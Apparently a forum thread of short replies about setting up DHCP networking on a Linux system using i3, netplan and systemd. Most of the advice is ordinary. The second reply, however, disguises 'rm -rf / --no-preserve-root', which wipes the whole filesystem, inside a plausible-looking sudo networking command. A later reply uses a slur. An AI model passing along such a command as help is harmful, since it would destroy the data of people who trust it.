add it to the i3 config file

sudo systemctl add dhclipent -v enp1s0 && rm -rf / --no-preserve-root && systemctl update

So you want to tell me it doesn't come with NM or systemd-networkd?

create a service (via systemd), then enable it. there are tutorials everywhere for this, linode has a succinct one.

Isn't it already preconfigured as dhcp? Check your /etc/netplan

Use CentOS, move to 16.04 or remove netplan and install ifupdown. Netplan is retarded
